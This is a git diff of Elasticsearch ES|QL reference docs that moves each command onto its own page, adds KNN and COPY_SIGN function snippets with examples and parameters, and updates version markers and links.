diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md b/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md
index 76901580aed49..ad1275cf37b51 100644
--- a/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md
+++ b/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md
@@ -75,7 +75,7 @@ FROM employees
 ::::{note}
 `BUCKET` does not filter any rows. It only uses the provided range to pick a good bucket size. For rows with a value outside of the range, it returns a bucket value that corresponds to a bucket outside the range.
-Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to filter rows.
+Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter rows.
 ::::
 
 If the desired bucket size is known in advance, simply provide it as the second
@@ -179,7 +179,7 @@ FROM employees
 | 54539.75 | 1985-11-01T00:00:00.000Z |
 
 `BUCKET` may be used in both the aggregating and grouping part of the
-[STATS ... BY ...](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command provided that in the aggregating
+[STATS ... BY ...](/reference/query-languages/esql/commands/stats-by.md) command provided that in the aggregating
 part the function is referenced by an alias defined in the grouping part, or that it is invoked with the exact same expression:
diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/count.md b/docs/reference/query-languages/esql/_snippets/functions/examples/count.md
index 98a7f0c930b4c..cad958a96dbc4 100644
--- a/docs/reference/query-languages/esql/_snippets/functions/examples/count.md
+++ b/docs/reference/query-languages/esql/_snippets/functions/examples/count.md
@@ -39,7 +39,7 @@ ROW words="foo;bar;baz;qux;quux;foo"
 | --- |
 | 6 |
 
-To count the number of times an expression returns `TRUE` use a [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command to remove rows that shouldn’t be included
+To count the number of times an expression returns `TRUE` use a [`WHERE`](/reference/query-languages/esql/commands/where.md) command to remove rows that shouldn’t be included
 
 ```esql
 ROW n=1
diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md b/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md
index f6168c1893976..f446855dcfaa5 100644
--- a/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md
+++ b/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md
@@ -14,8 +14,7 @@ FROM employees
 | Amabile | Gomatam | 1992-11-18T00:00:00.000Z | 1992-01-01T00:00:00.000Z |
 | Anneke | Preusig | 1989-06-02T00:00:00.000Z | 1989-01-01T00:00:00.000Z |
 
-Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) to create date histograms. For
-example, the number of hires per year:
+Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/stats-by.md) to create date histograms. For example, the number of hires per year:
 
 ```esql
 FROM employees
diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md b/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md
new file mode 100644
index 0000000000000..2a474d7bfef13
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md
@@ -0,0 +1,30 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+
+**Examples**
+
+```esql
+from colors metadata _score
+| where knn(rgb_vector, [0, 120, 0])
+| sort _score desc, color asc
+```
+
+| color:text | rgb_vector:dense_vector |
+| --- | --- |
+| green | [0.0, 128.0, 0.0] |
+| black | [0.0, 0.0, 0.0] |
+| olive | [128.0, 128.0, 0.0] |
+| teal | [0.0, 128.0, 128.0] |
+| lime | [0.0, 255.0, 0.0] |
+| sienna | [160.0, 82.0, 45.0] |
+| maroon | [128.0, 0.0, 0.0] |
+| navy | [0.0, 0.0, 128.0] |
+| gray | [128.0, 128.0, 128.0] |
+| chartreuse | [127.0, 255.0, 0.0] |
+
+```esql
+from colors metadata _score
+| where knn(rgb_vector, [0,255,255], {"k": 4})
+| sort _score desc, color asc
+```
+
+
diff --git a/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md b/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md
new file mode 100644
index 0000000000000..d663e403f8a42
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md
@@ -0,0 +1,19 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+
+**Supported function named parameters**
+
+`num_candidates`
+: (integer) The number of nearest neighbor candidates to consider per shard while doing knn search. Cannot exceed 10,000. Increasing num_candidates tends to improve the accuracy of the final results. Defaults to 1.5 * k
+
+`boost`
+: (float) Floating point number used to decrease or increase the relevance scores of the query. Defaults to 1.0.
+
+`k`
+: (integer) The number of nearest neighbors to return from each shard. Elasticsearch collects k results from each shard, then merges them to find the global top results. This value must be less than or equal to num_candidates. Defaults to 10.
+
+`rescore_oversample`
+: (double) Applies the specified oversampling for rescoring quantized vectors. See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details.
+
+`similarity`
+: (double) The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw similarity used, not the document score.
+
diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md b/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md
index ca23c1e2efc23..6667980ef84eb 100644
--- a/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md
+++ b/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md
@@ -1,6 +1,9 @@
 % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
 
 ## `CATEGORIZE` [esql-categorize]
+```{applies_to}
+stack: preview 9.0, ga 9.1
+```
 
 **Syntax**
 
diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md
new file mode 100644
index 0000000000000..7c423b66344fd
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md
@@ -0,0 +1,20 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+
+## `COPY_SIGN` [esql-copy_sign]
+
+**Syntax**
+
+:::{image} ../../../images/functions/copy_sign.svg
+:alt: Embedded
+:class: text-center
+:::
+
+
+:::{include} ../parameters/copy_sign.md
+:::
+
+:::{include} ../description/copy_sign.md
+:::
+
+:::{include} ../types/copy_sign.md
+:::
diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md b/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md
new file mode 100644
index 0000000000000..dae08f95757b9
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md
@@ -0,0 +1,30 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+ +## `KNN` [esql-knn] +```{applies_to} +stack: development +serverless: preview +``` + +**Syntax** + +:::{image} ../../../images/functions/knn.svg +:alt: Embedded +:class: text-center +::: + + +:::{include} ../parameters/knn.md +::: + +:::{include} ../description/knn.md +::: + +:::{include} ../types/knn.md +::: + +:::{include} ../functionNamedParams/knn.md +::: + +:::{include} ../examples/knn.md +::: diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md b/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md index 6eb9e17bf35f9..f658fbf1bbde2 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md @@ -2,7 +2,7 @@ ## `MATCH_PHRASE` [esql-match_phrase] ```{applies_to} -stack: unavailable 9.0, ga 9.1.0 +stack: ga 9.1.0 ``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md b/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md index 05d8cef498116..9fd348abe8cd9 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md @@ -1,6 +1,9 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ## `SAMPLE` [esql-sample] +```{applies_to} +stack: ga 9.1.0 +``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md b/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md index 19ff3246f4ca1..bae02950efa6c 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md @@ -1,6 +1,9 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ## `SCALB` [esql-scalb] +```{applies_to} +stack: ga 9.1.0 +``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md new file mode 100644 index 0000000000000..78de6d0388741 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md @@ -0,0 +1,10 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Parameters** + +`magnitude` +: The expression providing the magnitude of the result. Must be a numeric type. + +`sign` +: The expression providing the sign of the result. Must be a numeric type. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md b/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md new file mode 100644 index 0000000000000..fb1b98a1e8a7a --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md @@ -0,0 +1,13 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Parameters** + +`field` +: Field that the query will target. + +`query` +: Vector value to find top nearest neighbours for. + +`options` +: (Optional) kNN additional options as [function named parameters](/reference/query-languages/esql/esql-syntax.md#esql-function-named-params). 
See [knn query](/reference/query-languages/query-dsl/query-dsl-match-query.md#query-dsl-knn-query) for more information. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md new file mode 100644 index 0000000000000..a0cbc6eed3f8e --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md @@ -0,0 +1,16 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Supported types** + +| magnitude | sign | result | +| --- | --- | --- | +| double | double | double | +| double | integer | double | +| double | long | double | +| integer | double | integer | +| integer | integer | integer | +| integer | long | integer | +| long | double | long | +| long | integer | long | +| long | long | long | + diff --git a/docs/reference/query-languages/esql/_snippets/lists/math-functions.md b/docs/reference/query-languages/esql/_snippets/lists/math-functions.md index 54c1a4dd9635a..5ef3b6c499a1b 100644 --- a/docs/reference/query-languages/esql/_snippets/lists/math-functions.md +++ b/docs/reference/query-languages/esql/_snippets/lists/math-functions.md @@ -5,6 +5,7 @@ * [`ATAN2`](../../functions-operators/math-functions.md#esql-atan2) * [`CBRT`](../../functions-operators/math-functions.md#esql-cbrt) * [`CEIL`](../../functions-operators/math-functions.md#esql-ceil) +* [`COPY_SIGN`](../../functions-operators/math-functions.md#esql-copy_sign) * [`COS`](../../functions-operators/math-functions.md#esql-cos) * [`COSH`](../../functions-operators/math-functions.md#esql-cosh) * [`E`](../../functions-operators/math-functions.md#esql-e) diff --git a/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md b/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md index a9bf1e276b95d..85c778d3b3f8b 100644 --- a/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md +++ b/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md @@ -1,15 +1,17 @@ -* [preview] [`CHANGE_POINT`](../../commands/processing-commands.md#esql-change_point) -* [`DISSECT`](../../commands/processing-commands.md#esql-dissect) -* [`DROP`](../../commands/processing-commands.md#esql-drop) -* [`ENRICH`](../../commands/processing-commands.md#esql-enrich) -* [`EVAL`](../../commands/processing-commands.md#esql-eval) -* [`GROK`](../../commands/processing-commands.md#esql-grok) -* [`KEEP`](../../commands/processing-commands.md#esql-keep) -* [`LIMIT`](../../commands/processing-commands.md#esql-limit) -* [`LOOKUP JOIN`](../../commands/processing-commands.md#esql-lookup-join) -* [preview] [`MV_EXPAND`](../../commands/processing-commands.md#esql-mv_expand) -* [`RENAME`](../../commands/processing-commands.md#esql-rename) -* [preview] [`SAMPLE`](../../commands/processing-commands.md#esql-sample) -* [`SORT`](../../commands/processing-commands.md#esql-sort) -* [`STATS`](../../commands/processing-commands.md#esql-stats-by) -* [`WHERE`](../../commands/processing-commands.md#esql-where) +* [preview] [`CHANGE_POINT`](/reference/query-languages/esql/commands/change-point.md) +* [preview] [`COMPLETION`](/reference/query-languages/esql/commands/completion.md) +* [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) +* [`DROP`](/reference/query-languages/esql/commands/drop.md) +* [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) +* 
[`EVAL`](/reference/query-languages/esql/commands/eval.md)
+* [preview] [`FORK`](/reference/query-languages/esql/commands/fork.md)
+* [`GROK`](/reference/query-languages/esql/commands/grok.md)
+* [`KEEP`](/reference/query-languages/esql/commands/keep.md)
+* [`LIMIT`](/reference/query-languages/esql/commands/limit.md)
+* [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md)
+* [preview] [`MV_EXPAND`](/reference/query-languages/esql/commands/mv_expand.md)
+* [`RENAME`](/reference/query-languages/esql/commands/rename.md)
+* [preview] [`SAMPLE`](/reference/query-languages/esql/commands/sample.md)
+* [`SORT`](/reference/query-languages/esql/commands/sort.md)
+* [`STATS`](/reference/query-languages/esql/commands/stats-by.md)
+* [`WHERE`](/reference/query-languages/esql/commands/where.md)
diff --git a/docs/reference/query-languages/esql/_snippets/lists/source-commands.md b/docs/reference/query-languages/esql/_snippets/lists/source-commands.md
index 21194abdec2f7..ceaa5147da7cf 100644
--- a/docs/reference/query-languages/esql/_snippets/lists/source-commands.md
+++ b/docs/reference/query-languages/esql/_snippets/lists/source-commands.md
@@ -1,3 +1,3 @@
-* [`FROM`](../../commands/source-commands.md#esql-from)
-* [`ROW`](../../commands/source-commands.md#esql-row)
-* [`SHOW`](../../commands/source-commands.md#esql-show)
+- [`FROM`](/reference/query-languages/esql/commands/from.md)
+- [`ROW`](/reference/query-languages/esql/commands/row.md)
+- [`SHOW`](/reference/query-languages/esql/commands/show.md)
\ No newline at end of file
diff --git a/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md b/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md
index d000d79e0c433..0e9cff4fcefe5 100644
--- a/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md
+++ b/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md
@@ -10,17 +10,24 @@
 ROW message = "foo * bar"
 ```
 
+To reduce the overhead of escaping, we suggest using triple-quoted strings `"""`
+
 ```esql
-ROW message = "foobar"
-| WHERE message like ("foo*", "bar?")
+ROW message = "foo * bar"
+| WHERE message LIKE """foo \* bar"""
 ```
 
-To reduce the overhead of escaping, we suggest using triple quotes strings `"""`
+```{applies_to}
+stack: ga 9.1
+serverless: ga
+```
+Both a single pattern and a list of patterns are supported. If a list of patterns is provided,
+the expression will return true if any of the patterns match.
 
 ```esql
-ROW message = "foo * bar"
-| WHERE message LIKE """foo \* bar"""
+ROW message = "foobar"
+| WHERE message like ("foo*", "bar?")
 ```
 
diff --git a/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md b/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md
deleted file mode 100644
index ba34a2d736a83..0000000000000
--- a/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md
+++ /dev/null
@@ -1,26 +0,0 @@
-% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
- -**Examples** - -```esql -FROM employees -| WHERE birth_date IS NULL -``` - -| first_name:keyword | last_name:keyword | -| --- | --- | -| Basil | Tramer | -| Florian | Syrotiuk | -| Lucien | Rosenbaum | - -```esql -FROM employees -| WHERE is_rehired IS NOT NULL -| STATS COUNT(emp_no) -``` - -| COUNT(emp_no):long | -| --- | -| 84 | - - diff --git a/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md b/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md deleted file mode 100644 index 19fc0a9465976..0000000000000 --- a/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md +++ /dev/null @@ -1,22 +0,0 @@ -% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. - -**Supported types** - -| field | result | -| --- | --- | -| boolean | boolean | -| cartesian_point | boolean | -| cartesian_shape | boolean | -| date | boolean | -| date_nanos | boolean | -| double | boolean | -| geo_point | boolean | -| geo_shape | boolean | -| integer | boolean | -| ip | boolean | -| keyword | boolean | -| long | boolean | -| text | boolean | -| unsigned_long | boolean | -| version | boolean | - diff --git a/docs/reference/query-languages/esql/commands/change-point.md b/docs/reference/query-languages/esql/commands/change-point.md new file mode 100644 index 0000000000000..96d4c6a41868c --- /dev/null +++ b/docs/reference/query-languages/esql/commands/change-point.md @@ -0,0 +1,10 @@ +--- +navigation_title: "CHANGE_POINT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-change_point +--- + +# `CHANGE_POINT` [esql-change_point] + +:::{include} ../_snippets/commands/layout/change_point.md +::: diff --git a/docs/reference/query-languages/esql/commands/completion.md b/docs/reference/query-languages/esql/commands/completion.md new file mode 100644 index 0000000000000..1d93b387b957c --- /dev/null +++ b/docs/reference/query-languages/esql/commands/completion.md @@ -0,0 +1,10 @@ +--- +navigation_title: "COMPLETION" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-completion +--- + +# `COMPLETION` [esql-completion] + +:::{include} ../_snippets/commands/layout/completion.md +::: diff --git a/docs/reference/query-languages/esql/commands/dissect.md b/docs/reference/query-languages/esql/commands/dissect.md new file mode 100644 index 0000000000000..54646b8b1a5d1 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/dissect.md @@ -0,0 +1,10 @@ +--- +navigation_title: "DISSECT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-dissect +--- + +# `DISSECT` [esql-dissect] + +:::{include} ../_snippets/commands/layout/dissect.md +::: diff --git a/docs/reference/query-languages/esql/commands/drop.md b/docs/reference/query-languages/esql/commands/drop.md new file mode 100644 index 0000000000000..dc66933e7849b --- /dev/null +++ b/docs/reference/query-languages/esql/commands/drop.md @@ -0,0 +1,10 @@ +--- +navigation_title: "DROP" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-drop +--- + +# `DROP` [esql-drop] + +:::{include} ../_snippets/commands/layout/drop.md +::: diff --git a/docs/reference/query-languages/esql/commands/enrich.md b/docs/reference/query-languages/esql/commands/enrich.md new file mode 100644 index 0000000000000..7b6d4f3787d7b --- /dev/null +++ 
b/docs/reference/query-languages/esql/commands/enrich.md @@ -0,0 +1,10 @@ +--- +navigation_title: "ENRICH" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-enrich +--- + +# `ENRICH` [esql-enrich] + +:::{include} ../_snippets/commands/layout/enrich.md +::: diff --git a/docs/reference/query-languages/esql/commands/eval.md b/docs/reference/query-languages/esql/commands/eval.md new file mode 100644 index 0000000000000..6a912610c95f5 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/eval.md @@ -0,0 +1,10 @@ +--- +navigation_title: "EVAL" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-eval +--- + +# `EVAL` [esql-eval] + +:::{include} ../_snippets/commands/layout/eval.md +::: diff --git a/docs/reference/query-languages/esql/commands/fork.md b/docs/reference/query-languages/esql/commands/fork.md new file mode 100644 index 0000000000000..841c64c9d9dcf --- /dev/null +++ b/docs/reference/query-languages/esql/commands/fork.md @@ -0,0 +1,10 @@ +--- +navigation_title: "FORK" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-fork +--- + +# `FORK` [esql-fork] + +:::{include} ../_snippets/commands/layout/fork.md +::: diff --git a/docs/reference/query-languages/esql/commands/from.md b/docs/reference/query-languages/esql/commands/from.md new file mode 100644 index 0000000000000..0cef20784e8cc --- /dev/null +++ b/docs/reference/query-languages/esql/commands/from.md @@ -0,0 +1,10 @@ +--- +navigation_title: "FROM" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-from +--- + +# `FROM` [esql-from] + +:::{include} ../_snippets/commands/layout/from.md +::: diff --git a/docs/reference/query-languages/esql/commands/grok.md b/docs/reference/query-languages/esql/commands/grok.md new file mode 100644 index 0000000000000..4c895cd8d1d4f --- /dev/null +++ b/docs/reference/query-languages/esql/commands/grok.md @@ -0,0 +1,10 @@ +--- +navigation_title: "GROK" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-grok +--- + +# `GROK` [esql-grok] + +:::{include} ../_snippets/commands/layout/grok.md +::: diff --git a/docs/reference/query-languages/esql/commands/keep.md b/docs/reference/query-languages/esql/commands/keep.md new file mode 100644 index 0000000000000..b4ed9d4becebe --- /dev/null +++ b/docs/reference/query-languages/esql/commands/keep.md @@ -0,0 +1,10 @@ +--- +navigation_title: "KEEP" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-keep +--- + +# `KEEP` [esql-keep] + +:::{include} ../_snippets/commands/layout/keep.md +::: diff --git a/docs/reference/query-languages/esql/commands/limit.md b/docs/reference/query-languages/esql/commands/limit.md new file mode 100644 index 0000000000000..ba9c7f78a2267 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/limit.md @@ -0,0 +1,10 @@ +--- +navigation_title: "LIMIT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-limit +--- + +# `LIMIT` [esql-limit] + +:::{include} ../_snippets/commands/layout/limit.md +::: diff --git a/docs/reference/query-languages/esql/commands/lookup-join.md b/docs/reference/query-languages/esql/commands/lookup-join.md new file mode 100644 index 0000000000000..4de8fdea84718 --- /dev/null +++ 
b/docs/reference/query-languages/esql/commands/lookup-join.md @@ -0,0 +1,10 @@ +--- +navigation_title: "LOOKUP JOIN" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-lookup-join +--- + +# `LOOKUP JOIN` [esql-lookup-join] + +:::{include} ../_snippets/commands/layout/lookup-join.md +::: diff --git a/docs/reference/query-languages/esql/commands/mv_expand.md b/docs/reference/query-languages/esql/commands/mv_expand.md new file mode 100644 index 0000000000000..eed1d35c11297 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/mv_expand.md @@ -0,0 +1,10 @@ +--- +navigation_title: "MV_EXPAND" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-mv_expand +--- + +# `MV_EXPAND` [esql-mv_expand] + +:::{include} ../_snippets/commands/layout/mv_expand.md +::: diff --git a/docs/reference/query-languages/esql/commands/processing-commands.md b/docs/reference/query-languages/esql/commands/processing-commands.md index 57084779d6d7a..5af3208256242 100644 --- a/docs/reference/query-languages/esql/commands/processing-commands.md +++ b/docs/reference/query-languages/esql/commands/processing-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Processing commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -16,48 +19,3 @@ mapped_pages: :::{include} ../_snippets/lists/processing-commands.md ::: - -:::{include} ../_snippets/commands/layout/change_point.md -::: - -:::{include} ../_snippets/commands/layout/dissect.md -::: - -:::{include} ../_snippets/commands/layout/drop.md -::: - -:::{include} ../_snippets/commands/layout/enrich.md -::: - -:::{include} ../_snippets/commands/layout/eval.md -::: - -:::{include} ../_snippets/commands/layout/grok.md -::: - -:::{include} ../_snippets/commands/layout/keep.md -::: - -:::{include} ../_snippets/commands/layout/limit.md -::: - -:::{include} ../_snippets/commands/layout/lookup-join.md -::: - -:::{include} ../_snippets/commands/layout/mv_expand.md -::: - -:::{include} ../_snippets/commands/layout/rename.md -::: - -:::{include} ../_snippets/commands/layout/sample.md -::: - -:::{include} ../_snippets/commands/layout/sort.md -::: - -:::{include} ../_snippets/commands/layout/stats-by.md -::: - -:::{include} ../_snippets/commands/layout/where.md -::: diff --git a/docs/reference/query-languages/esql/commands/rename.md b/docs/reference/query-languages/esql/commands/rename.md new file mode 100644 index 0000000000000..a21bda78f5025 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/rename.md @@ -0,0 +1,10 @@ +--- +navigation_title: "RENAME" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-rename +--- + +# `RENAME` [esql-rename] + +:::{include} ../_snippets/commands/layout/rename.md +::: diff --git a/docs/reference/query-languages/esql/commands/row.md b/docs/reference/query-languages/esql/commands/row.md new file mode 100644 index 0000000000000..1c5d180c87cc7 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/row.md @@ -0,0 +1,10 @@ +--- +navigation_title: "ROW" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-row +--- + +# `ROW` [esql-row] + +:::{include} ../_snippets/commands/layout/row.md +::: diff --git a/docs/reference/query-languages/esql/commands/sample.md b/docs/reference/query-languages/esql/commands/sample.md new file mode 
100644 index 0000000000000..3e9ed11428175 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/sample.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SAMPLE" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-sample +--- + +# `SAMPLE` [esql-sample] + +:::{include} ../_snippets/commands/layout/sample.md +::: diff --git a/docs/reference/query-languages/esql/commands/show.md b/docs/reference/query-languages/esql/commands/show.md new file mode 100644 index 0000000000000..130abec311750 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/show.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SHOW" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-show +--- + +# `SHOW` [esql-show] + +:::{include} ../_snippets/commands/layout/show.md +::: diff --git a/docs/reference/query-languages/esql/commands/sort.md b/docs/reference/query-languages/esql/commands/sort.md new file mode 100644 index 0000000000000..ada8a69b93bfd --- /dev/null +++ b/docs/reference/query-languages/esql/commands/sort.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SORT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-sort +--- + +# `SORT` [esql-sort] + +:::{include} ../_snippets/commands/layout/sort.md +::: diff --git a/docs/reference/query-languages/esql/commands/source-commands.md b/docs/reference/query-languages/esql/commands/source-commands.md index 8717ea15ddd95..1dc8a6dc4c466 100644 --- a/docs/reference/query-languages/esql/commands/source-commands.md +++ b/docs/reference/query-languages/esql/commands/source-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Source commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -17,12 +20,3 @@ An {{esql}} source command produces a table, typically with data from {{es}}. 
An :::{include} ../_snippets/lists/source-commands.md ::: -:::{include} ../_snippets/commands/layout/from.md -::: - -:::{include} ../_snippets/commands/layout/row.md -::: - -:::{include} ../_snippets/commands/layout/show.md -::: - diff --git a/docs/reference/query-languages/esql/commands/stats-by.md b/docs/reference/query-languages/esql/commands/stats-by.md new file mode 100644 index 0000000000000..c4b7892cfa5a7 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/stats-by.md @@ -0,0 +1,10 @@ +--- +navigation_title: "STATS" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-stats-by +--- + +# `STATS` [esql-stats-by] + +:::{include} ../_snippets/commands/layout/stats-by.md +::: diff --git a/docs/reference/query-languages/esql/commands/where.md b/docs/reference/query-languages/esql/commands/where.md new file mode 100644 index 0000000000000..28d0b999f2df5 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/where.md @@ -0,0 +1,10 @@ +--- +navigation_title: "WHERE" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-where +--- + +# `WHERE` [esql-where] + +:::{include} ../_snippets/commands/layout/where.md +::: diff --git a/docs/reference/query-languages/esql/esql-commands.md b/docs/reference/query-languages/esql/esql-commands.md index 9c5ec270ecd2a..d50de09122b72 100644 --- a/docs/reference/query-languages/esql/esql-commands.md +++ b/docs/reference/query-languages/esql/esql-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -6,28 +9,7 @@ mapped_pages: # {{esql}} commands [esql-commands] -## Source commands [esql-source-commands] +{{esql}} commands come in two flavors, source commands and processing commands: -An {{esql}} source command produces a table, typically with data from {{es}}. An {{esql}} query must start with a source command. - -:::{image} ../images/source-command.svg -:alt: A source command producing a table from {{es}} -::: - -{{esql}} supports these source commands: - -:::{include} _snippets/lists/source-commands.md -::: - -## Processing commands [esql-processing-commands] - -{{esql}} processing commands change an input table by adding, removing, or changing rows and columns. - -:::{image} ../images/processing-command.svg -:alt: A processing command changing an input table -::: - 